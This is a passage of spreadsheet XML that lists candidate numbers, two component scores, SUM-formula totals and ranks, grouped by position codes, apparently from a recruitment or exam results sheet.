      <c r="F561" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="G561" s="14"/>
      <c r="H561" s="8" t="n">
        <f aca="false">SUM(E561:G561)</f>
        <v>106.8</v>
      </c>
      <c r="I561" s="14" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="562" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A562" s="14" t="n">
        <v>4300091</v>
      </c>
      <c r="B562" s="8" t="n">
        <v>1314012004</v>
      </c>
      <c r="C562" s="8" t="s">
        <v>153</v>
      </c>
      <c r="D562" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E562" s="8" t="n">
        <v>46.4</v>
      </c>
      <c r="F562" s="8" t="n">
        <v>60.2</v>
      </c>
      <c r="G562" s="14"/>
      <c r="H562" s="8" t="n">
        <f aca="false">SUM(E562:G562)</f>
        <v>106.6</v>
      </c>
      <c r="I562" s="14" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="563" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A563" s="14" t="n">
        <v>4300091</v>
      </c>
      <c r="B563" s="8" t="n">
        <v>1314011930</v>
      </c>
      <c r="C563" s="8" t="s">
        <v>153</v>
      </c>
      <c r="D563" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E563" s="8" t="n">
        <v>46</v>
      </c>
      <c r="F563" s="8" t="n">
        <v>58.6</v>
      </c>
      <c r="G563" s="14"/>
      <c r="H563" s="8" t="n">
        <f aca="false">SUM(E563:G563)</f>
        <v>104.6</v>
      </c>
      <c r="I563" s="14" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="564" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A564" s="14" t="n">
        <v>4300091</v>
      </c>
      <c r="B564" s="8" t="n">
        <v>1314011929</v>
      </c>
      <c r="C564" s="8" t="s">
        <v>153</v>
      </c>
      <c r="D564" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E564" s="8" t="n">
        <v>46.4</v>
      </c>
      <c r="F564" s="8" t="n">
        <v>57.2</v>
      </c>
      <c r="G564" s="14"/>
      <c r="H564" s="8" t="n">
        <f aca="false">SUM(E564:G564)</f>
        <v>103.6</v>
      </c>
      <c r="I564" s="14" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="565" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A565" s="14" t="n">
        <v>4300091</v>
      </c>
      <c r="B565" s="8" t="n">
        <v>1314012002</v>
      </c>
      <c r="C565" s="8" t="s">
        <v>153</v>
      </c>
      <c r="D565" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E565" s="8" t="n">
        <v>54.4</v>
      </c>
      <c r="F565" s="8" t="n">
        <v>49</v>
      </c>
      <c r="G565" s="14"/>
      <c r="H565" s="8" t="n">
        <f aca="false">SUM(E565:G565)</f>
        <v>103.4</v>
      </c>
      <c r="I565" s="14" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="566" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A566" s="14" t="n">
        <v>4300091</v>
      </c>
      <c r="B566" s="8" t="n">
        <v>1314012001</v>
      </c>
      <c r="C566" s="8" t="s">
        <v>153</v>
      </c>
      <c r="D566" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E566" s="8" t="n">
        <v>46.2</v>
      </c>
      <c r="F566" s="8" t="n">
        <v>49.2</v>
      </c>
      <c r="G566" s="14"/>
      <c r="H566" s="8" t="n">
        <f aca="false">SUM(E566:G566)</f>
        <v>95.4</v>
      </c>
      <c r="I566" s="14" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="567" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A567" s="14" t="n">
        <v>4300091</v>
      </c>
      <c r="B567" s="8" t="n">
        <v>1314011928</v>
      </c>
      <c r="C567" s="8" t="s">
        <v>153</v>
      </c>
      <c r="D567" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E567" s="8" t="n">
        <v>36.8</v>
      </c>
      <c r="F567" s="8" t="n">
        <v>49.4</v>
      </c>
      <c r="G567" s="14"/>
      <c r="H567" s="8" t="n">
        <f aca="false">SUM(E567:G567)</f>
        <v>86.2</v>
      </c>
      <c r="I567" s="14" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="568" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A568" s="14" t="n">
        <v>4300092</v>
      </c>
      <c r="B568" s="8" t="n">
        <v>1314012006</v>
      </c>
      <c r="C568" s="8" t="s">
        <v>154</v>
      </c>
      <c r="D568" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E568" s="8" t="n">
        <v>70</v>
      </c>
      <c r="F568" s="8" t="n">
        <v>69.6</v>
      </c>
      <c r="G568" s="14"/>
      <c r="H568" s="8" t="n">
        <f aca="false">SUM(E568:G568)</f>
        <v>139.6</v>
      </c>
      <c r="I568" s="14" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="569" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A569" s="14" t="n">
        <v>4300092</v>
      </c>
      <c r="B569" s="8" t="n">
        <v>1314012007</v>
      </c>
      <c r="C569" s="8" t="s">
        <v>154</v>
      </c>
      <c r="D569" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E569" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="F569" s="8" t="n">
        <v>72.8</v>
      </c>
      <c r="G569" s="14"/>
      <c r="H569" s="8" t="n">
        <f aca="false">SUM(E569:G569)</f>
        <v>134.4</v>
      </c>
      <c r="I569" s="14" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="570" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A570" s="14" t="n">
        <v>4300092</v>
      </c>
      <c r="B570" s="8" t="n">
        <v>1314012012</v>
      </c>
      <c r="C570" s="8" t="s">
        <v>154</v>
      </c>
      <c r="D570" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E570" s="8" t="n">
        <v>53.2</v>
      </c>
      <c r="F570" s="8" t="n">
        <v>59.6</v>
      </c>
      <c r="G570" s="14"/>
      <c r="H570" s="8" t="n">
        <f aca="false">SUM(E570:G570)</f>
        <v>112.8</v>
      </c>
      <c r="I570" s="14" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="571" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A571" s="14" t="n">
        <v>4300092</v>
      </c>
      <c r="B571" s="8" t="n">
        <v>1314012008</v>
      </c>
      <c r="C571" s="8" t="s">
        <v>154</v>
      </c>
      <c r="D571" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E571" s="8" t="n">
        <v>54.6</v>
      </c>
      <c r="F571" s="8" t="n">
        <v>56.2</v>
      </c>
      <c r="G571" s="14"/>
      <c r="H571" s="8" t="n">
        <f aca="false">SUM(E571:G571)</f>
        <v>110.8</v>
      </c>
      <c r="I571" s="14" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="572" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A572" s="14" t="n">
        <v>4300092</v>
      </c>
      <c r="B572" s="8" t="n">
        <v>1314012011</v>
      </c>
      <c r="C572" s="8" t="s">
        <v>154</v>
      </c>
      <c r="D572" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E572" s="8" t="n">
        <v>48.8</v>
      </c>
      <c r="F572" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="G572" s="14"/>
      <c r="H572" s="8" t="n">
        <f aca="false">SUM(E572:G572)</f>
        <v>104.6</v>
      </c>
      <c r="I572" s="14" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="573" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A573" s="14" t="n">
        <v>4300092</v>
      </c>
      <c r="B573" s="8" t="n">
        <v>1314012010</v>
      </c>
      <c r="C573" s="8" t="s">
        <v>154</v>
      </c>
      <c r="D573" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E573" s="8" t="n">
        <v>28</v>
      </c>
      <c r="F573" s="8" t="n">
        <v>58.6</v>
      </c>
      <c r="G573" s="14"/>
      <c r="H573" s="8" t="n">
        <f aca="false">SUM(E573:G573)</f>
        <v>86.6</v>
      </c>
      <c r="I573" s="14" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="574" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A574" s="14" t="n">
        <v>4300092</v>
      </c>
      <c r="B574" s="8" t="n">
        <v>1314012009</v>
      </c>
      <c r="C574" s="8" t="s">
        <v>154</v>
      </c>
      <c r="D574" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E574" s="8" t="n">
        <v>33.6</v>
      </c>
      <c r="F574" s="8" t="n">
        <v>40.2</v>
      </c>
      <c r="G574" s="14"/>
      <c r="H574" s="8" t="n">
        <f aca="false">SUM(E574:G574)</f>
        <v>73.8</v>
      </c>
      <c r="I574" s="14" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="575" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A575" s="9" t="n">
        <v>4300094</v>
      </c>
      <c r="B575" s="8" t="n">
        <v>1314012013</v>
      </c>
      <c r="C575" s="11" t="s">
        <v>155</v>
      </c>
      <c r="D575" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E575" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="F575" s="8" t="n">
        <v>62</v>
      </c>
      <c r="G575" s="11"/>
      <c r="H575" s="8" t="n">
        <f aca="false">SUM(E575:G575)</f>
        <v>124.2</v>
      </c>
      <c r="I575" s="9" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="576" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A576" s="9" t="n">
        <v>4300094</v>
      </c>
      <c r="B576" s="8" t="n">
        <v>1314012014</v>
      </c>
      <c r="C576" s="11" t="s">
        <v>155</v>
      </c>
      <c r="D576" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E576" s="8" t="n">
        <v>47.8</v>
      </c>
      <c r="F576" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G576" s="11"/>
      <c r="H576" s="8" t="n">
        <v>47.8</v>
      </c>
      <c r="I576" s="9" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="577" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A577" s="9" t="n">
        <v>4300094</v>
      </c>
      <c r="B577" s="8" t="n">
        <v>1314012015</v>
      </c>
      <c r="C577" s="11" t="s">
        <v>155</v>
      </c>
      <c r="D577" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E577" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F577" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G577" s="11"/>
      <c r="H577" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I577" s="9" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="578" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A578" s="9" t="n">
        <v>4300095</v>
      </c>
      <c r="B578" s="8" t="n">
        <v>1314012022</v>
      </c>
      <c r="C578" s="11" t="s">
        <v>156</v>
      </c>
      <c r="D578" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E578" s="8" t="n">
        <v>60.2</v>
      </c>
      <c r="F578" s="8" t="n">
        <v>72</v>
      </c>
      <c r="G578" s="11"/>
      <c r="H578" s="8" t="n">
        <f aca="false">SUM(E578:G578)</f>
        <v>132.2</v>
      </c>
      <c r="I578" s="9" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="579" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A579" s="9" t="n">
        <v>4300095</v>
      </c>
      <c r="B579" s="8" t="n">
        <v>1314012019</v>
      </c>
      <c r="C579" s="11" t="s">
        <v>156</v>
      </c>
      <c r="D579" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E579" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="F579" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="G579" s="11"/>
      <c r="H579" s="8" t="n">
        <f aca="false">SUM(E579:G579)</f>
        <v>126</v>
      </c>
      <c r="I579" s="9" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="580" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A580" s="9" t="n">
        <v>4300095</v>
      </c>
      <c r="B580" s="8" t="n">
        <v>1314012020</v>
      </c>
      <c r="C580" s="11" t="s">
        <v>156</v>
      </c>
      <c r="D580" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E580" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="F580" s="8" t="n">
        <v>64.4</v>
      </c>
      <c r="G580" s="11"/>
      <c r="H580" s="8" t="n">
        <f aca="false">SUM(E580:G580)</f>
        <v>126</v>
      </c>
      <c r="I580" s="9" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="581" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A581" s="9" t="n">
        <v>4300095</v>
      </c>
      <c r="B581" s="8" t="n">
        <v>1314012017</v>
      </c>
      <c r="C581" s="11" t="s">
        <v>156</v>
      </c>
      <c r="D581" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E581" s="8" t="n">
        <v>55</v>
      </c>
      <c r="F581" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="G581" s="9" t="n">
        <v>5</v>
      </c>
      <c r="H581" s="8" t="n">
        <f aca="false">SUM(E581:G581)</f>
        <v>121.6</v>
      </c>
      <c r="I581" s="9" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="582" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A582" s="9" t="n">
        <v>4300095</v>
      </c>
      <c r="B582" s="8" t="n">
        <v>1314012023</v>
      </c>
      <c r="C582" s="11" t="s">
        <v>156</v>
      </c>
      <c r="D582" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E582" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="F582" s="8" t="n">
        <v>59</v>
      </c>
      <c r="G582" s="11"/>
      <c r="H582" s="8" t="n">
        <f aca="false">SUM(E582:G582)</f>
        <v>117.2</v>
      </c>
      <c r="I582" s="9" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="583" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A583" s="9" t="n">
        <v>4300095</v>
      </c>
      <c r="B583" s="8" t="n">
        <v>1314012018</v>
      </c>
      <c r="C583" s="11" t="s">
        <v>156</v>
      </c>
      <c r="D583" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E583" s="8" t="n">
        <v>52</v>
      </c>
      <c r="F583" s="8" t="n">
        <v>65</v>
      </c>
      <c r="G583" s="11"/>
      <c r="H583" s="8" t="n">
        <f aca="false">SUM(E583:G583)</f>
        <v>117</v>
      </c>
      <c r="I583" s="9" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="584" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A584" s="9" t="n">
        <v>4300095</v>
      </c>
      <c r="B584" s="8" t="n">
        <v>1314012024</v>
      </c>
      <c r="C584" s="11" t="s">
        <v>156</v>
      </c>
      <c r="D584" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E584" s="8" t="n">
        <v>46.8</v>
      </c>
      <c r="F584" s="8" t="n">
        <v>62</v>
      </c>
      <c r="G584" s="11"/>
      <c r="H584" s="8" t="n">
        <f aca="false">SUM(E584:G584)</f>
        <v>108.8</v>
      </c>
      <c r="I584" s="9" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="585" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A585" s="9" t="n">
        <v>4300095</v>
      </c>
      <c r="B585" s="8" t="n">
        <v>1314012016</v>
      </c>
      <c r="C585" s="11" t="s">
        <v>156</v>
      </c>
      <c r="D585" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E585" s="8" t="n">
        <v>49.4</v>
      </c>
      <c r="F585" s="8" t="n">
        <v>55.6</v>
      </c>
      <c r="G585" s="11"/>
      <c r="H585" s="8" t="n">
        <f aca="false">SUM(E585:G585)</f>
        <v>105</v>
      </c>
      <c r="I585" s="9" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="586" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A586" s="9" t="n">
        <v>4300095</v>
      </c>
      <c r="B586" s="8" t="n">
        <v>1314012021</v>
      </c>
      <c r="C586" s="11" t="s">
        <v>156</v>
      </c>
      <c r="D586" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E586" s="8" t="n">
        <v>40.6</v>
      </c>
      <c r="F586" s="8" t="n">
        <v>48.8</v>
      </c>
      <c r="G586" s="11"/>
      <c r="H586" s="8" t="n">
        <f aca="false">SUM(E586:G586)</f>
        <v>89.4</v>
      </c>
      <c r="I586" s="9" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="587" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A587" s="9" t="n">
        <v>4300096</v>
      </c>
      <c r="B587" s="8" t="n">
        <v>1314012025</v>
      </c>
      <c r="C587" s="11" t="s">
        <v>157</v>
      </c>
      <c r="D587" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E587" s="8" t="n">
        <v>59.6</v>
      </c>
      <c r="F587" s="8" t="n">
        <v>70.4</v>
      </c>
      <c r="G587" s="11"/>
      <c r="H587" s="8" t="n">
        <f aca="false">SUM(E587:G587)</f>
        <v>130</v>
      </c>
      <c r="I587" s="9" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="588" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A588" s="9" t="n">
        <v>4300096</v>
      </c>
      <c r="B588" s="8" t="n">
        <v>1314012102</v>
      </c>
      <c r="C588" s="11" t="s">
        <v>157</v>
      </c>
      <c r="D588" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E588" s="8" t="n">
        <v>63.8</v>
      </c>
      <c r="F588" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="G588" s="11"/>
      <c r="H588" s="8" t="n">
        <f aca="false">SUM(E588:G588)</f>
        <v>126.4</v>
      </c>
      <c r="I588" s="9" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="589" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A589" s="9" t="n">
        <v>4300096</v>
      </c>
      <c r="B589" s="8" t="n">
        <v>1314012028</v>
      </c>
      <c r="C589" s="11" t="s">
        <v>157</v>
      </c>
      <c r="D589" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E589" s="8" t="n">
        <v>57.4</v>
      </c>
      <c r="F589" s="8" t="n">
        <v>64.4</v>
      </c>
      <c r="G589" s="11"/>
      <c r="H589" s="8" t="n">
        <f aca="false">SUM(E589:G589)</f>
        <v>121.8</v>
      </c>
      <c r="I589" s="9" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="590" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A590" s="9" t="n">
        <v>4300096</v>
      </c>
      <c r="B590" s="8" t="n">
        <v>1314012103</v>
      </c>
      <c r="C590" s="11" t="s">
        <v>157</v>
      </c>
      <c r="D590" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E590" s="8" t="n">
        <v>55.6</v>
      </c>
      <c r="F590" s="8" t="n">
        <v>65.2</v>
      </c>
      <c r="G590" s="11"/>
      <c r="H590" s="8" t="n">
        <f aca="false">SUM(E590:G590)</f>
        <v>120.8</v>
      </c>
      <c r="I590" s="9" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="591" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A591" s="9" t="n">
        <v>4300096</v>
      </c>
      <c r="B591" s="8" t="n">
        <v>1314012026</v>
      </c>
      <c r="C591" s="11" t="s">
        <v>157</v>
      </c>
      <c r="D591" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E591" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="F591" s="8" t="n">
        <v>64.2</v>
      </c>
      <c r="G591" s="11"/>
      <c r="H591" s="8" t="n">
        <f aca="false">SUM(E591:G591)</f>
        <v>116.4</v>
      </c>
      <c r="I591" s="9" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="592" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A592" s="9" t="n">
        <v>4300096</v>
      </c>
      <c r="B592" s="8" t="n">
        <v>1314012104</v>
      </c>
      <c r="C592" s="11" t="s">
        <v>157</v>
      </c>
      <c r="D592" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E592" s="8" t="n">
        <v>54.6</v>
      </c>
      <c r="F592" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="G592" s="11"/>
      <c r="H592" s="8" t="n">
        <f aca="false">SUM(E592:G592)</f>
        <v>116.2</v>
      </c>
      <c r="I592" s="9" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="593" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A593" s="9" t="n">
        <v>4300096</v>
      </c>
      <c r="B593" s="8" t="n">
        <v>1314012101</v>
      </c>
      <c r="C593" s="11" t="s">
        <v>157</v>
      </c>
      <c r="D593" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E593" s="8" t="n">
        <v>53</v>
      </c>
      <c r="F593" s="8" t="n">
        <v>62</v>
      </c>
      <c r="G593" s="11"/>
      <c r="H593" s="8" t="n">
        <f aca="false">SUM(E593:G593)</f>
        <v>115</v>
      </c>
      <c r="I593" s="9" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="594" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A594" s="9" t="n">
        <v>4300096</v>
      </c>
      <c r="B594" s="8" t="n">
        <v>1314012030</v>
      </c>
      <c r="C594" s="11" t="s">
        <v>157</v>
      </c>
      <c r="D594" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E594" s="8" t="n">
        <v>55.6</v>
      </c>
      <c r="F594" s="8" t="n">
        <v>48.2</v>
      </c>
      <c r="G594" s="11"/>
      <c r="H594" s="8" t="n">
        <f aca="false">SUM(E594:G594)</f>
        <v>103.8</v>
      </c>
      <c r="I594" s="9" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="595" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A595" s="9" t="n">
        <v>4300096</v>
      </c>
      <c r="B595" s="8" t="n">
        <v>1314012029</v>
      </c>
      <c r="C595" s="11" t="s">
        <v>157</v>
      </c>
      <c r="D595" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E595" s="8" t="n">
        <v>45.8</v>
      </c>
      <c r="F595" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="G595" s="11"/>
      <c r="H595" s="8" t="n">
        <f aca="false">SUM(E595:G595)</f>
        <v>102.4</v>
      </c>
      <c r="I595" s="9" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="596" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A596" s="9" t="n">
        <v>4300096</v>
      </c>
      <c r="B596" s="8" t="n">
        <v>1314012027</v>
      </c>
      <c r="C596" s="11" t="s">
        <v>157</v>
      </c>
      <c r="D596" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E596" s="8" t="n">
        <v>49.2</v>
      </c>
      <c r="F596" s="8" t="n">
        <v>50.6</v>
      </c>
      <c r="G596" s="11"/>
      <c r="H596" s="8" t="n">
        <f aca="false">SUM(E596:G596)</f>
        <v>99.8</v>
      </c>
      <c r="I596" s="9" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="597" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A597" s="9" t="n">
        <v>4300097</v>
      </c>
      <c r="B597" s="8" t="n">
        <v>1314012106</v>
      </c>
      <c r="C597" s="11" t="s">
        <v>158</v>
      </c>
      <c r="D597" s="11" t="s">
        <v>127</v>
      </c>
      <c r="E597" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="F597" s="8" t="n">
        <v>68.8</v>
      </c>
      <c r="G597" s="11"/>
      <c r="H597" s="8" t="n">
        <f aca="false">SUM(E597:G597)</f>
        <v>127</v>
      </c>
      <c r="I597" s="9" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="598" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A598" s="9" t="n">
        <v>4300097</v>
      </c>
      <c r="B598" s="8" t="n">
        <v>1314012105</v>
      </c>
      <c r="C598" s="11" t="s">
        <v>158</v>
      </c>
      <c r="D598" s="11" t="s">
        <v>127</v>
      </c>
      <c r="E598" s="8" t="n">
        <v>43.4</v>
      </c>
      <c r="F598" s="8" t="n">
        <v>42</v>
      </c>
      <c r="G598" s="11"/>
      <c r="H598" s="8" t="n">
        <f aca="false">SUM(E598:G598)</f>
        <v>85.4</v>
      </c>
      <c r="I598" s="9" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="599" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A599" s="15" t="n">
        <v>4300098</v>
      </c>
      <c r="B599" s="8" t="n">
        <v>1314012107</v>
      </c>
      <c r="C599" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D599" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E599" s="8" t="n">
        <v>51.4</v>
      </c>
      <c r="F599" s="8" t="n">
        <v>61</v>
      </c>
      <c r="G599" s="14"/>
      <c r="H599" s="8" t="n">
        <f aca="false">SUM(E599:G599)</f>
        <v>112.4</v>
      </c>
      <c r="I599" s="14" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="600" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A600" s="15" t="n">
        <v>4300098</v>
      </c>
      <c r="B600" s="8" t="n">
        <v>1314012108</v>
      </c>
      <c r="C600" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D600" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E600" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F600" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G600" s="14"/>
      <c r="H600" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I600" s="14" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="601" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A601" s="15" t="n">
        <v>4300098</v>
      </c>
      <c r="B601" s="8" t="n">
        <v>1314012109</v>
      </c>
      <c r="C601" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D601" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E601" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F601" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G601" s="14"/>
      <c r="H601" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I601" s="14" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="602" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A602" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B602" s="8" t="n">
        <v>1314012121</v>
      </c>
      <c r="C602" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D602" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E602" s="8" t="n">
        <v>57.2</v>
      </c>
      <c r="F602" s="8" t="n">
        <v>70</v>
      </c>
      <c r="G602" s="14"/>
      <c r="H602" s="8" t="n">
        <f aca="false">SUM(E602:G602)</f>
        <v>127.2</v>
      </c>
      <c r="I602" s="14" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="603" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A603" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B603" s="8" t="n">
        <v>1314012123</v>
      </c>
      <c r="C603" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D603" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E603" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="F603" s="8" t="n">
        <v>69.2</v>
      </c>
      <c r="G603" s="14"/>
      <c r="H603" s="8" t="n">
        <f aca="false">SUM(E603:G603)</f>
        <v>121.4</v>
      </c>
      <c r="I603" s="14" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="604" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A604" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B604" s="8" t="n">
        <v>1314012112</v>
      </c>
